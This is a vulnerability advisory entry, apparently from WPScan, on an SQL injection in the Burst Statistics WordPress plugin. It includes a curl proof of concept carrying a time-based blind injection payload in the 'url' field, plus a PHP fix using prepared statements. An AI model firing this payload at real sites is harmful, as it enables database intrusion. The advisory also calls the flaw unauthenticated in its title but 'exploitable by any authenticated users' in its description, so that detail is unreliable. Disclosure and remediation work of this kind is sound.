wpvulndb WPVDB-ID: 0C0AB92C-8FDD-4A58-814F-E974714A20C8
History: Dec 11, 2023 - 12:00 a.m.

Burst Statistics (Free < 1.5.0, Pro < 1.5.1) - Unauthenticated SQL Injection

Published: 2023-12-11 00:00:00
Source: wpscan.com
6
Tags: sql injection, unauthenticated users, url parameter

EPSS: 0.001 (Low), percentile 34.0%

Description

The plugins do not properly sanitise and escape the url parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated users, such as subscribers.

PoC

curl 'https://example.com/burst-statistics-endpoint.php' \
  -H 'content-type: text/plain;charset=UTF-8' \
  --data-raw $'"{\"fingerprint\":false,\"uid\":\"437a969907141c6c2042731efd2da038\",\"url\":\"https://example.com/abc\'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\'\\\",\\\"time_on_page\\\":6907,\\\"completed_goals\\\":[]}"' \
  --compressed
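As an added illustration of the fix for the defect class the description names (this is not Burst Statistics code; the table and column names, the function name and the request handling are assumptions), a WordPress handler that takes the same JSON body as the PoC above and binds the url value through $wpdb->prepare instead of concatenating it into the statement:

```php
<?php
// Added example, not the plugin's own code. Assumed table/column names;
// relies on the WordPress globals and helpers ($wpdb, esc_url_raw, absint).

function burst_example_record_hit( $raw_body ) {
    global $wpdb;

    $data = json_decode( $raw_body, true );
    if ( ! is_array( $data ) || empty( $data['url'] ) ) {
        return false; // malformed body: record nothing
    }

    // Constrain the shape before anything reaches SQL: the tracked URL must
    // survive esc_url_raw() and the counter must be a non-negative integer.
    $url          = esc_url_raw( (string) $data['url'] );
    $time_on_page = isset( $data['time_on_page'] ) ? absint( $data['time_on_page'] ) : 0;
    if ( '' === $url ) {
        return false;
    }

    $table = $wpdb->prefix . 'burst_example_statistics'; // assumed table name

    // Weak form (the pattern the advisory describes): the value is interpolated
    // into the statement, so a quote inside it changes the query structure.
    //   $wpdb->query( "INSERT INTO $table (url, time_on_page) VALUES ('$url', $time_on_page)" );

    // Hardened form: placeholders only. prepare() escapes the %s argument and
    // casts the %d argument, so the request body can never alter the statement.
    $sql = $wpdb->prepare(
        "INSERT INTO {$table} (url, time_on_page) VALUES (%s, %d)",
        $url,
        $time_on_page
    );

    return false !== $wpdb->query( $sql );
}
```

The same rule applies to the lookup or UPDATE that follows the insert: every request-derived value, including the uid, goes through a placeholder, and identifiers such as the table name come only from the plugin's own constants.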

CPE    Name    Operator    Version
                eq          1.5.1
                eq          1.5.0
